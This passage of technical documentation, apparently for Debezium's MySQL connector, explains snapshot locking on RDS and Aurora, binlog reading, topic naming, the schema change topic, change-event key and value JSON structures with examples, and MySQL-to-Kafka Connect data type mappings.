Otherwise, the binlog events between the committed offset and the binlog position with the schema change will be emitted with an inconsistent schema
(already based on the altered schema, which didn't apply yet for these previous events).
It is therefore recommended -- once recovery of the history topic has succeeded -- to return to one of the other snapshotting modes, to prevent further snapshots after subsequent restarts of the connector.

Because of how the connector records offsets when performing a snapshot, the connector now defaults to `include.schema.changes=true`. This writes all DDL changes performed during a snapshot to a topic that can be consumed by apps. And, more importantly, during the final step mentioned above it ensures that the updated offsets are recorded immediately (rather than waiting until a database change occurs).

[[snapshots-without-global-read-locks]]
==== Snapshots without global read locks

Some MySQL environments, including https://aws.amazon.com/rds/mysql/[Amazon RDS] and https://aws.amazon.com/rds/aurora/[Amazon Aurora (MySQL compatibility)], do not allow users to obtain global read locks. As of 0.4.0, when the MySQL connector detects that a global read lock is not allowed, it falls back to table-level locks (requiring that the database user also has the `LOCK TABLES` privilege) and performs a snapshot using these steps:

1. Start a transaction with https://dev.mysql.com/doc/refman/5.6/en/innodb-consistent-read.html[_repeatable read_ semantics] to ensure that all subsequent reads within this transaction are done against a single consistent snapshot.
2. Attempt and fail to obtain a global read lock that would block writes by other database clients.
3. Read the names of the databases and tables, filtering them using the connector's configuration.
4. Acquire a table-level lock on all configured tables.
5. Read the current position of the binlog.
6. Read the schema of all configured databases and tables.
7. Optionally write the DDL changes to the _schema change topic_, including all necessary `DROP ...` and `CREATE ...` DDL statements.
8. Scan all of the database tables, and generate `CREATE` events for each row on the appropriate table-specific Kafka topics.
9. Commit the transaction.
10. Release the table-level locks.
11. Record in the connector offsets that the connector successfully completed the snapshot.

Note that the _table-level locks are held for nearly all of the consistent snapshot_, including the reading of all database table content in step 8. This is very different than when a global read lock can be used, since that is held for a very short period of time. Unfortunately, this is the only way that the MySQL connector can obtain a consistent snapshot, since https://dev.mysql.com/doc/refman/5.7/en/lock-tables-and-transactions.html[releasing the table-level locks implicitly commits any open transaction held by the session]. Since we need the transaction to obtain a consistent snapshot of the database content, we are unable to release the table-level locks until after we've read the data in step 8 and committed our transaction in step 9.
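For reference, selecting among the snapshot modes described above is done with the `snapshot.mode` property in the connector's configuration. Here is a sketch of a connector registration, in which the hostname, credentials, and names are hypothetical for your environment:

[source,json]
----
{
  "name": "fulfillment-connector",
  "config": {
    "connector.class": "io.debezium.connector.mysql.MySqlConnector",
    "database.hostname": "mysql.example.com",
    "database.port": "3306",
    "database.user": "debezium",
    "database.password": "dbz",
    "database.server.id": "223345",
    "database.server.name": "fulfillment",
    "database.history.kafka.bootstrap.servers": "kafka:9092",
    "database.history.kafka.topic": "dbhistory.fulfillment",
    "snapshot.mode": "when_needed"
  }
}
----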
[[reading-the-binlog]]
=== Reading the MySQL binlog

The MySQL connector will typically spend the vast majority of its time reading the binlog of the MySQL server to which it is connected.

As the MySQL connector reads the binlog, it transforms the binary log events into Debezium _create_, _update_, or _delete_ events that include the position in the binlog (including GTIDs if they are used) where the event was found. The MySQL connector forwards these change events to the Kafka Connect framework (running in the same process), which then synchronously writes them to the appropriate Kafka topic. Kafka Connect uses the term _offset_ for the source-specific position information that Debezium includes with each event, and Kafka Connect periodically records the most recent offset in another Kafka topic.

When Kafka Connect gracefully shuts down, it stops the connectors, flushes all events to Kafka, and records the last offset received from each connector. Upon restart, Kafka Connect reads the last recorded offset for each connector, and starts each connector from that point. The MySQL connector uses the binlog filename, the position in that file, and the GTIDs (if they are enabled in the MySQL server) recorded in its offset to request that MySQL send it the binlog events starting just after that position.

[[topic-names]]
=== Topic names

The MySQL connector writes events for all insert, update, and delete operations on a single table to a single Kafka topic. The name of the Kafka topic always takes the form _serverName_._databaseName_._tableName_, where _serverName_ is the logical name of the connector as specified with the `database.server.name` configuration property, _databaseName_ is the name of the database where the operation occurred, and _tableName_ is the name of the database table on which the operation occurred.

For example, consider a MySQL installation with an `inventory` database that contains four tables: `products`, `products_on_hand`, `customers`, and `orders`. If the connector monitoring this database were given a logical server name of `fulfillment`, then the connector would produce events on these four Kafka topics:

* `fulfillment.inventory.products`
* `fulfillment.inventory.products_on_hand`
* `fulfillment.inventory.customers`
* `fulfillment.inventory.orders`

[[schema-change-topic]]
=== Schema change topic

It is often useful for applications to consume events that describe the changes in the database schemas, so the MySQL connector can be configured to produce _schema change events_ with all of the DDL statements applied to databases in the MySQL server. When enabled, the connector writes all such events to a Kafka topic named _serverName_, where _serverName_ is the logical name of the connector as specified with the `database.server.name` configuration property. In our previous example where the logical server name is `fulfillment`, the schema change events would be recorded in the topic `fulfillment`.

[IMPORTANT]
====
The link:#database-schema-history[database history topic] and _schema change topic_ both contain events with the DDL statement. However, we've designed the events on the schema change topic to be easier to consume, so they are more granular and always have the database name.
If you're going to consume schema change events, be sure to use the schema change topic and _never_ consume the database history topic.\n====\n\n[NOTE]\n====\nIn order to keep the correct order of schema changes, the schema change topic must not be partitioned.\nThis means a partition count of 1 must be specified when creating this topic.\nWhen relying on auto topic creation, make sure that Kafka's `num.partitions` configuration option (the default number of partitions) is set to 1.\n====\n\nEach message written to the schema change topic will have a message key that contains the name of the database to which the client was connected and using when they applied the DDL statement(s):\n\n[source,json,indent=0]\n----\n {\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeKey\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\"\n }\n }\n----\n\nMeanwhile, the schema change event message's value will contain a structure containing the DDL statement(s), the database to which the statements were _applied_, and the position in the binlog where the statement(s) appeared:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n {\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeValue\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"ddl\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"source\",\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.Source\",\n \"optional\": false,\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ]\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\",\n \"ddl\": \"CREATE TABLE products ( id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) NOT NULL, description VARCHAR(512), weight FLOAT ); ALTER TABLE products AUTO_INCREMENT = 101;\",\n \"source\" : {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 0,\n \"ts_sec\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"snapshot\": true,\n \"thread\": null,\n \"db\": null,\n \"table\": null,\n \"query\": null\n }\n }\n }\n----\n\nThe `ddl` field may contain multiple DDL statements, but every statement in the event will apply to the database named in the `databaseName` field and they will 
appear in the same order as applied to the database. Additionally, all of the events in the schema change topic will appear in the same order as applied to the MySQL server.\n\n[TIP]\n====\nThe `source` field is the exact same structure that appears in normal data change events written to table-specific topics. You can use the contents of this field to correlate the events on different topics.\n====\n\nAs mentioned above, each schema change event will contain one or more DDL statements that apply to a single database. What happens if a client submits a series of DDL statements that apply to _multiple_ databases (e.g., perhaps they use fully-qualified names)? If MySQL applies those statements atomically (e.g., as a single transaction), then the connector will take those DDL statements _in order_, group them by the affected database, and then create a schema change event for each of those groups. On the other hand, if MySQL applies those statements individually, then the connector will create a separate schema change event for each statement.\n\n[[events]]\n=== Events\n\nAll data change events produced by the MySQL connector have a key and a value, although the structure of the key and value depend on the table from which the change events originated (see link:#topic-names[Topic Names]).\n\n[NOTE]\n====\nStarting with Kafka 0.10, Kafka can optionally record with the message key and value the http:\/\/kafka.apache.org\/documentation.html#upgrade_10_performance_impact[_timestamp_] at which the message was created (recorded by the producer) or written to the log by Kafka.\n====\n\n[WARNING]\n====\nAs of Debezium 0.3, the Debezium MySQL connector ensures that all Kafka Connect _schema names_ are http:\/\/avro.apache.org\/docs\/current\/spec.html#names[valid Avro schema names]. This means that the logical server name must start with Latin letters or an underscore (e.g., [a-z,A-Z,\\_]), and the remaining characters in the logical server name and all characters in the database and table names must be Latin letters, digits, or an underscore (e.g., [a-z,A-Z,0-9,\\_]). If not, then all invalid characters will automatically be replaced with an underscore character.\n\nThis can lead to unexpected conflicts in schemas names when the logical server name, database names, and table names contain other characters, and the only distinguishing characters between table full names are invalid and thus replaced with underscores.\n====\n\nDebezium and Kafka Connect are designed around _continuous streams of event messages_, and the structure of these events may change over time. This could be difficult for consumers to deal with, so to make it very easy Kafka Connect makes each event self-contained. Every message key and value has two parts: a _schema_ and _payload_. The schema describes the structure of the payload, while the payload contains the actual data.\n\n[[change-events-key]]\n==== Change event's key\n\nFor a given table, the change event's key will have a structure that contains a field for each column in the primary key (or unique key constraint) of the table at the time the event was created. 
Consider an `inventory` database with a `customers` table defined as:

[source,sql,indent=0]
----
CREATE TABLE customers (
  id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,
  first_name VARCHAR(255) NOT NULL,
  last_name VARCHAR(255) NOT NULL,
  email VARCHAR(255) NOT NULL UNIQUE KEY
) AUTO_INCREMENT=1001;
----

Every change event for the `customers` table while it has this definition will feature the same key structure, which in JSON looks like this:

[source,json,indent=0]
----
{
  "schema": {
    "type": "struct",
    "name": "mysql-server-1.inventory.customers.Key",
    "optional": false,
    "fields": [
      {
        "field": "id",
        "type": "int32",
        "optional": false
      }
    ]
  },
  "payload": {
    "id": 1001
  }
}
----

The `schema` portion of the key contains a Kafka Connect schema describing what is in the payload portion, and in our case that means that the `payload` value is not optional, is a structure defined by a schema named `mysql-server-1.inventory.customers.Key`, and has one required field named `id` of type `int32`. If we look at the value of the key's `payload` field, we'll see that it is indeed a structure (which in JSON is just an object) with a single `id` field, whose value is `1001`.

Therefore, we interpret this key as describing the row in the `inventory.customers` table (output from the connector named `mysql-server-1`) whose `id` primary key column had a value of `1001`.

[NOTE]
====
Although the `column.blacklist` configuration property allows you to remove columns from the event values, all columns in a primary or unique key are always included in the event's key.
====

[WARNING]
====
If the table does not have a primary or unique key, then the change event's key will be null. This makes sense since the rows in a table without a primary or unique key constraint cannot be uniquely identified.
====

[[change-events-value]]
==== Change event's value

The value of the change event message is a bit more complicated. Like the key message, it has a _schema_ section and a _payload_ section. Starting with Debezium 0.2, the payload section of every change event value produced by the MySQL connector has an _envelope_ structure with the following fields:

* `op` is a mandatory field that contains a string value describing the type of operation. Values for the MySQL connector are `c` for create (or insert), `u` for update, `d` for delete, and `r` for read (in the case of a non-initial snapshot).
* `before` is an optional field that, if present, contains the state of the row _before_ the event occurred. The structure will be described by the `mysql-server-1.inventory.customers.Value` Kafka Connect schema, which the `mysql-server-1` connector uses for all rows in the `inventory.customers` table.
* `after` is an optional field that, if present, contains the state of the row _after_ the event occurred.
The structure is described by the same `mysql-server-1.inventory.customers.Value` Kafka Connect schema used in `before`.\n* `source` is a mandatory field that contains a structure describing the source metadata for the event, which in the case of MySQL contains several fields: the Debezium version, the connector name, the name of the binlog file where the event was recorded, the position in that binlog file where the event appeared, the row within the event (if there is more than one), whether this event was part of a snapshot, name of the affected database and table, id of the MySQL thread creating the event (non-snapshot events only), and if available the MySQL server ID, and the timestamp in seconds. For non-snapshot events, if the MySQL server has the link:#enabling-query-log-events-optional[binlog_rows_query_log_events] option enabled, and the connector is configured with the `include.query` option enabled, the query field will contain the original SQL statement that generated the event.\n* `ts_ms` is optional and if present contains the time (using the system clock in the JVM running the Kafka Connect task) at which the connector processed the event.\n\nAnd of course, the _schema_ portion of the event message's value contains a schema that describes this envelope structure and the nested fields within it.\n\n[[create-events]]\nLet's look at what a _create_ event value might look like for our `customers` table:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"optional\": false,\n \"name\": \"mysql-server-1.inventory.customers.Envelope\",\n \"version\": 1,\n \"fields\": [\n {\n \"field\": \"op\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"before\",\n \"type\": \"struct\",\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ]\n },\n {\n \"field\": \"after\",\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Value\",\n \"optional\": true,\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ]\n },\n {\n \"field\": \"source\",\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.Source\",\n \"optional\": false,\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n 
},
 {
 "type": "int64",
 "optional": true,
 "field": "thread"
 },
 {
 "type": "string",
 "optional": true,
 "field": "db"
 },
 {
 "type": "string",
 "optional": true,
 "field": "table"
 },
 {
 "type": "string",
 "optional": true,
 "field": "query"
 }
 ]
 },
 {
 "field": "ts_ms",
 "type": "int64",
 "optional": true
 }
 ]
 },
 "payload": {
 "op": "c",
 "ts_ms": 1465491411815,
 "before": null,
 "after": {
 "id": 1004,
 "first_name": "Anne",
 "last_name": "Kretchmar",
 "email": "annek@noanswer.org"
 },
 "source": {
 "version": "{debezium-version}",
 "name": "mysql-server-1",
 "server_id": 0,
 "ts_sec": 0,
 "gtid": null,
 "file": "mysql-bin.000003",
 "pos": 154,
 "row": 0,
 "snapshot": false,
 "thread": 7,
 "db": "inventory",
 "table": "customers",
 "query": "INSERT INTO customers (first_name, last_name, email) VALUES ('Anne', 'Kretchmar', 'annek@noanswer.org')"
 }
 }
}
----

If we look at the `schema` portion of this event's _value_, we can see the schema for the _envelope_, the schema for the `source` structure (which is specific to the MySQL connector and reused across all events), and the table-specific schemas for the `before` and `after` fields.

[TIP]
====
The names of the schemas for the `before` and `after` fields are of the form "_logicalName_._tableName_.Value", and thus are entirely independent from all other schemas for all other tables. This means that when using the link:/docs/faq/#avro-converter[Avro Converter], the resulting Avro schemas for _each table_ in each _logical source_ have their own evolution and history.
====

If we look at the `payload` portion of this event's _value_, we can see the information in the event, namely that it is describing that the row was created (since `op=c`), and that the `after` field value contains the values of the newly inserted row's `id`, `first_name`, `last_name`, and `email` columns.

[TIP]
====
It may appear that the JSON representations of the events are much larger than the rows they describe. This is true, because the JSON representation must include the _schema_ and the _payload_ portions of the message. It is possible and even recommended to use the link:/docs/faq/#avro-converter[Avro Converter] to dramatically decrease the size of the actual messages written to the Kafka topics.
====

[[update-events]]
The value of an _update_ change event on this table will actually have the exact same _schema_, and its payload will be structured the same but will hold different values. Here's an example of such an event's _value_, formatted to be easier to read:

[source,json,indent=0,subs="attributes"]
----
{
 "schema": { ...
},
 "payload": {
 "before": {
 "id": 1004,
 "first_name": "Anne",
 "last_name": "Kretchmar",
 "email": "annek@noanswer.org"
 },
 "after": {
 "id": 1004,
 "first_name": "Anne Marie",
 "last_name": "Kretchmar",
 "email": "annek@noanswer.org"
 },
 "source": {
 "version": "{debezium-version}",
 "name": "mysql-server-1",
 "server_id": 223344,
 "ts_sec": 1465581,
 "gtid": null,
 "file": "mysql-bin.000003",
 "pos": 484,
 "row": 0,
 "snapshot": false,
 "thread": 7,
 "db": "inventory",
 "table": "customers",
 "query": "UPDATE customers SET first_name='Anne Marie' WHERE id=1004"
 },
 "op": "u",
 "ts_ms": 1465581029523
 }
}
----

When we compare this to the value in the _insert_ event, we see a couple of differences in the `payload` section:

* The `op` field value is now `u`, signifying that this row changed because of an update.
* The `before` field now has the state of the row with the values before the database commit.
* The `after` field now has the updated state of the row, and here we can see that the `first_name` value is now `Anne Marie`.
* The `source` field structure has the same fields as before, but the values are different since this event is from a different position in the binlog.
* The `ts_ms` field shows the timestamp at which Debezium processed this event.

There are several things we can learn by just looking at this `payload` section. We can compare the `before` and `after` structures to determine what actually changed in this row because of the commit. The `source` structure tells us information about MySQL's record of this change (providing traceability), but more importantly this has information we can compare to other events in this and other topics to know whether this event occurred before, after, or as part of the same MySQL commit as other events.

[NOTE]
====
When the columns for a row's primary/unique key are updated, the value of the row's key has changed, so Debezium will output _three_ events: a `DELETE` event and a link:#tombstone-events[tombstone event] with the old key for the row, followed by an `INSERT` event with the new key for the row.
====

[[delete-events]]
So far we've seen samples of _create_ and _update_ events. Now, let's look at the value of a _delete_ event for the same table. Once again, the `schema` portion of the value will be exactly the same as with the _create_ and _update_ events:

[source,json,indent=0,subs="attributes"]
----
{
 "schema": { ...
},
 "payload": {
 "before": {
 "id": 1004,
 "first_name": "Anne Marie",
 "last_name": "Kretchmar",
 "email": "annek@noanswer.org"
 },
 "after": null,
 "source": {
 "version": "{debezium-version}",
 "name": "mysql-server-1",
 "server_id": 223344,
 "ts_sec": 1465581,
 "gtid": null,
 "file": "mysql-bin.000003",
 "pos": 805,
 "row": 0,
 "snapshot": false,
 "thread": 7,
 "db": "inventory",
 "table": "customers",
 "query": "DELETE FROM customers WHERE id=1004"
 },
 "op": "d",
 "ts_ms": 1465581902461
 }
}
----

If we look at the `payload` portion, we see a number of differences compared with the _create_ or _update_ event payloads:

* The `op` field value is now `d`, signifying that this row was deleted.
* The `before` field now has the state of the row that was deleted with the database commit.
* The `after` field is null, signifying that the row no longer exists.
* The `source` field structure has many of the same values as before, except the `ts_sec` and `pos` fields have changed (and the `file` might have changed in other circumstances).
* The `ts_ms` field shows the timestamp at which Debezium processed this event.

This event gives a consumer all kinds of information that it can use to process the removal of this row. We include the old values because some consumers might require them in order to properly handle the removal; without them, consumers may have to resort to far more complex behavior.

The MySQL connector's events are designed to work with https://cwiki.apache.org/confluence/display/KAFKA/Log+Compaction[Kafka log compaction], which allows for the removal of some older messages as long as at least the most recent message for every key is kept. This allows Kafka to reclaim storage space while ensuring the topic contains a complete dataset and can be used for reloading key-based state.

[[tombstone-events]]
When a row is deleted, the _delete_ event value listed above still works with log compaction, since Kafka can still remove all earlier messages with that same key. But only if the message value is null will Kafka know that it can remove _all messages_ with that same key. To make this possible, Debezium's MySQL connector always follows a _delete_ event with a special _tombstone_ event that has the same key but a null value.

[NOTE]
====
As of Kafka 0.10, the JSON converter provided by Kafka Connect never results in a null value for the message (https://issues.apache.org/jira/browse/KAFKA-3832[KAFKA-3832]). Therefore, Kafka's log compaction will always retain the last message, even when the tombstone event is supplied, though it will be free to remove all prior messages with the same key. In other words, until this is fixed, using the JSON Converter will reduce the effectiveness of Kafka's log compaction.

In the meantime, consider using the link:/docs/faq/#avro-converter[Avro Converter], which does properly return a null value and will thus take full advantage of Kafka log compaction.
====
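
For illustration, here is a sketch (hypothetical and abbreviated, following the JSON converter format used in the examples above) of the two messages a consumer of this topic would see for the delete described above: first the _delete_ event, then the tombstone with the identical key and a literal null value:

----
key:   { "schema": { ... }, "payload": { "id": 1004 } }
value: { "schema": { ... }, "payload": { "op": "d", "before": { ... }, "after": null, ... } }

key:   { "schema": { ... }, "payload": { "id": 1004 } }
value: null
----
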
[[data-types]]
=== Data types

As described above, the MySQL connector represents the changes to rows with events that are structured like the table in which the rows exist. The event contains a field for each column value, and how that value is represented in the event depends on the MySQL data type of the column. This section describes this mapping.

The following table describes how the connector maps each of the MySQL data types to a _literal type_ and _semantic type_ within the events' fields. Here, the _literal type_ describes how the value is literally represented using Kafka Connect schema types, namely `INT8`, `INT16`, `INT32`, `INT64`, `FLOAT32`, `FLOAT64`, `BOOLEAN`, `STRING`, `BYTES`, `ARRAY`, `MAP`, and `STRUCT`. The _semantic type_ describes how the Kafka Connect schema captures the _meaning_ of the field using the name of the Kafka Connect schema for the field.

[cols="20%a,15%a,30%a,35%a",width=100,options="header,footer",role="table table-bordered table-striped"]
|=======================
|MySQL Data Type
|Literal type (schema type)
|Semantic type (schema name)
|Notes

|`BOOLEAN`, `BOOL`
|`BOOLEAN`
|n/a
|

|`BIT(1)`
|`BOOLEAN`
|n/a
|

|`BIT( > 1)`
|`BYTES`
|`io.debezium.data.Bits`
|The `length` schema parameter contains an integer representing the number of bits. The resulting `byte[]` will contain the bits in little-endian form and will be sized to contain at least the specified number of bits (e.g., `numBytes = n/8 + (n%8 == 0 ? 0 : 1)` where `n` is the number of bits).

|`TINYINT`
|`INT8`
|n/a
|

|`SMALLINT[(M)]`
|`INT16`
|n/a
|

|`MEDIUMINT[(M)]`
|`INT32`
|n/a
|

|`INT`, `INTEGER[(M)]`
|`INT32`
|n/a
|

|`BIGINT[(M)]`
|`INT64`
|n/a
|

|`REAL[(M,D)]`
|`FLOAT32`
|n/a
|

|`FLOAT[(M,D)]`
|`FLOAT64`
|n/a
|

|`DOUBLE[(M,D)]`
|`FLOAT64`
|n/a
|

|`CHAR(M)`
|`STRING`
|n/a
|

|`VARCHAR(M)`
|`STRING`
|n/a
|

|`BINARY(M)`
|`BYTES`
|n/a
|

|`VARBINARY(M)`
|`BYTES`
|n/a
|

|`TINYBLOB`
|`BYTES`
|n/a
|

|`TINYTEXT`
|`STRING`
|n/a
|

|`BLOB`
|`BYTES`
|n/a
|

|`TEXT`
|`STRING`
|n/a
|

|`MEDIUMBLOB`
|`BYTES`
|n/a
|

|`MEDIUMTEXT`
|`STRING`
|n/a
|

|`LONGBLOB`
|`BYTES`
|n/a
|

|`LONGTEXT`
|`STRING`
|n/a
|

|`JSON`
|`STRING`
|`io.debezium.data.Json`
|Contains the string representation of a JSON document, array, or scalar.

|`ENUM`
|`STRING`
|`io.debezium.data.Enum`
|The `allowed` schema parameter contains the comma-separated list of allowed values.

|`SET`
|`STRING`
|`io.debezium.data.EnumSet`
|The `allowed` schema parameter contains the comma-separated list of allowed values.

|`YEAR[(2\|4)]`
|`INT32`
|`io.debezium.time.Year`
|

|`TIMESTAMP[(M)]`
|`STRING`
|`io.debezium.time.ZonedTimestamp`
| Contains an ISO8601 formatted date and time (with up to microsecond precision) in a particular time zone. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision.

|=======================

Columns that store strings are defined in MySQL with a character set and collation, either explicitly on the column's definition or implicitly by inheriting the table's, database's, or server's default character sets and collations. As of 0.3.1, the MySQL connector uses the column's character set when reading the binary representation of the column values in the binlog events.

Other data type mappings are described in the following sections.

If present, a column's default value will be propagated to the corresponding field's Kafka Connect schema.
For `TIMESTAMP` columns whose default value is specified as `CURRENT_TIMESTAMP` or `NOW`, the value _1970-01-01 00:00:00_ will be used as the default value in the Kafka Connect schema.
Change messages will contain the field's default value
(unless an explicit column value had been given), so there should rarely be a need to obtain the default value from the schema.
Passing the default value does, however, help satisfy the compatibility rules when link:/docs/configuration/avro/[using Avro] as the serialization format together with the Confluent schema registry.
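
For example, a hypothetical column defined as `status VARCHAR(10) DEFAULT 'active'` might be described by a field schema that carries the default, along the lines of this sketch (using the same Kafka Connect field-schema format as the event examples above):

[source,json,indent=0]
----
{
  "type": "string",
  "optional": true,
  "default": "active",
  "field": "status"
}
----
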
[[temporal-values]]
==== Temporal values

Other than MySQL's `TIMESTAMP` data type, the MySQL temporal types depend on the value of the `time.precision.mode` configuration property.

[NOTE]
====
As of Debezium 0.7, the `adaptive_time_microseconds` mode was introduced and is the default `time.precision.mode` for the MySQL connector. The `adaptive` mode was marked as deprecated.
====

[WARNING]
====
When `time.precision.mode` is set to `adaptive`, only positive TIME field values in the range of 00:00:00.000000 to 23:59:59.999999 can be captured correctly.
When `time.precision.mode` is set to `connect`, only values in the range of 00:00:00.000 to 23:59:59.999 can be handled.

The `adaptive` and `connect` time precision modes should only be used if you can make sure that the TIME values in your tables will never exceed the supported ranges. These modes will be removed in a future version of Debezium.
====

When the `time.precision.mode` configuration property is set to `adaptive_time_microseconds` (the default), the connector will determine the literal type and semantic type for the MySQL types `TIME`, `DATE` and `DATETIME` based on the column's data type definition so that events _exactly_ represent the values in the database; all TIME fields will be captured as microseconds:

[cols="15%a,15%a,35%a,35%a",width=100,options="header,footer",role="table table-bordered table-striped"]
|=======================
|MySQL Data Type
|Literal type (schema type)
|Semantic type (schema name)
|Notes

|`DATE`
|`INT32`
|`io.debezium.time.Date`
| Represents the number of days since epoch.

|`TIME[(M)]`
|`INT64`
|`io.debezium.time.MicroTime`
| Represents the time value in microseconds and does not include timezone information. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision.

|`DATETIME`, `DATETIME(0)`, `DATETIME(1)`, `DATETIME(2)`, `DATETIME(3)`
|`INT64`
|`io.debezium.time.Timestamp`
| Represents the number of milliseconds past epoch, and does not include timezone information.

|`DATETIME(4)`, `DATETIME(5)`, `DATETIME(6)`
|`INT64`
|`io.debezium.time.MicroTimestamp`
| Represents the number of microseconds past epoch, and does not include timezone information.

|=======================

When the `time.precision.mode` configuration property is set to `adaptive` (deprecated), the connector will determine the literal type and semantic type for the temporal types based on the column's data type definition so that events _exactly_ represent the values in the database:

[cols="15%a,15%a,35%a,35%a",width=100,options="header,footer",role="table table-bordered table-striped"]
|=======================
|MySQL Data Type
|Literal type (schema type)
|Semantic type (schema name)
|Notes

|`DATE`
|`INT32`
|`io.debezium.time.Date`
| Represents the number of days since epoch.

|`TIME`, `TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`
|`INT32`
|`io.debezium.time.Time`
| Represents the number of milliseconds past midnight, and does not include timezone information.

|`TIME(4)`, `TIME(5)`, `TIME(6)`
|`INT64`
|`io.debezium.time.MicroTime`
| Represents the number of microseconds past midnight, and does not include timezone information.

|`DATETIME`, `DATETIME(0)`, `DATETIME(1)`, `DATETIME(2)`, `DATETIME(3)`
|`INT64`
|`io.debezium.time.Timestamp`
| Represents the number of milliseconds past epoch, and does not include timezone information.

|`DATETIME(4)`, `DATETIME(5)`, `DATETIME(6)`
|`INT64`
|`io.debezium.time.MicroTimestamp`
| Represents the number of microseconds past epoch, and does not include timezone information.

|=======================

When the `time.precision.mode` configuration property is set to `connect`, the connector will use the predefined Kafka Connect logical types, as was the case with the 0.2.x MySQL connector. This may be useful when consumers only know about the built-in Kafka Connect logical types and are unable to handle variable-precision time values. On the other hand, since MySQL allows both `TIME` and `DATETIME` to have _fractional second precision_ of 0-6 to store up to microsecond precision, the events generated by a connector with the `connect` time precision mode will _*result in a loss of precision*_ when the database column has a _fractional second precision_ value greater than 3:

[cols="15%a,15%a,35%a,35%a",width=100,options="header,footer",role="table table-bordered table-striped"]
|=======================
|MySQL Data Type
|Literal type (schema type)
|Semantic type (schema name)
|Notes

|`DATE`
|`INT32`
|`org.apache.kafka.connect.data.Date`
| Represents the number of days since epoch.

|`TIME[(M)]`
|`INT64`
|`org.apache.kafka.connect.data.Time`
| Represents the number of milliseconds since midnight, and does not include timezone information. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `M` > 3.

|`DATETIME[(M)]`
|`INT64`
|`org.apache.kafka.connect.data.Timestamp`
| Represents the number of milliseconds since epoch, and does not include timezone information. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `M` > 3.

|=======================
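
To make the precision trade-off concrete, consider a hypothetical column of type `TIME(6)` holding the value `17:51:04.777123` (64,264 whole seconds past midnight):

----
adaptive_time_microseconds -> io.debezium.time.MicroTime (INT64):        64264777123 microseconds past midnight
connect                    -> org.apache.kafka.connect.data.Time (INT64):   64264777 milliseconds past midnight (the trailing 123 microseconds are lost)
----
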
[[zero-values]]
